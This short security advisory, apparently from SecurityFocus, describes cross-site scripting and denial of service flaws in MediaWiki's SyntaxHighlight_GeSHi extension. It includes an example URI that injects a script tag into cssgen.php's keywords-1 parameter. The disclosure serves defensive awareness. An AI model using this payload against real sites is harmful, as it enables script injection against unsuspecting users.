MediaWiki SyntaxHighlight_GeSHi Extension Cross Site Scripting and Denial of Service Vulnerabilities

To exploit the cross-site scripting issue, an attacker must entice an unsuspecting user to follow a malicious URI.

The following example URI is available:

http://www.example.com/extensions/SyntaxHighlight_GeSHi/geshi/contrib/cssgen.php?step=3&keywords-1=%3Cscript%3Ealert%281%29%3C/script%3E


 

Privacy Statement
Copyright 2010, SecurityFocus